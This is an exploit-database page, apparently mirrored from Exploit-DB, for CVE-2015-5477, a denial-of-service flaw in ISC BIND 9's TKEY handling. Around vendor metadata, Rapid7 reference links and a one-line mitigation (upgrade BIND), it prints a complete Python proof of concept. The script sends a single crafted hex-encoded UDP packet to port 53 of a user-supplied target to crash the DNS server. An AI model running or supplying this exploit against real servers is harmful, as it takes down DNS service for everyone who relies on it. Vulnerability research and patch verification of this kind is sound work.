header-logo
Suggest Exploit
vendor:
BIND 9
by:
elceef
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: BIND 9
Affected Version From: ISC BIND 9
Affected Version To: ISC BIND 9
Patch Exists: YES
Related CWE: CVE-2015-5477
CPE: a:isc:bind:9
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2016-0078/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2016-0079/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-alas-2015-573/https://www.rapid7.com/db/vulnerabilities/dns-bind-cve-2015-5477/https://www.rapid7.com/db/vulnerabilities/juniper-junos-os-jsa10718/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2015-5477/https://www.rapid7.com/db/vulnerabilities/aix-6.1.8-bind9_advisory8_cve-2015-5477/https://www.rapid7.com/db/vulnerabilities/aix-5.3.12-bind9_advisory8_cve-2015-5477/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2015-1513/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2015-1515/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2015-1514/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2015-5477/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2015-5477/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2015-5477/https://www.rapid7.com/db/vulnerabilities/aix-7.1.2-bind9_advisory8_cve-2015-5477/https://www.rapid7.com/db/vulnerabilities/aix-7.1.3-bind9_advisory8_cve-2015-5477/https://www.rapid7.com/db/vulnerabilities/aix-6.1.9-bind9_advisory8_cve-2015-5477/https://www.rapid7.com/db/vulnerabilities/ibm-aix-cve-2015-5477/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2015-5477/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2015-5477/https://www.rapid7.com/db/?q=CVE-2015-5477&type=&page=2https://www.rapid7.com/db/?q=CVE-2015-5477&type=&page=2
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: multiple
2015

PoC for BIND9 TKEY DoS

This exploit is a proof of concept for a denial of service vulnerability in ISC BIND 9. It sends a specially crafted packet to the target, which causes the server to crash.

Mitigation:

Upgrade to the latest version of BIND 9, which includes a patch for this vulnerability.
Source

Exploit-DB raw data:

#!/usr/bin/env python

# Exploit Title: PoC for BIND9 TKEY DoS
# Exploit Author: elceef
# Software Link: https://github.com/elceef/tkeypoc/
# Version: ISC BIND 9
# Tested on: multiple
# CVE : CVE-2015-5477


import socket
import sys

print('CVE-2015-5477 BIND9 TKEY PoC')

if len(sys.argv) < 2:
	print('Usage: ' + sys.argv[0] + ' [target]')
	sys.exit(1)

print('Sending packet to ' + sys.argv[1] + ' ...')

payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) 

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))

print('Done.')

Navigation

Suggest Exploit

Services By CQR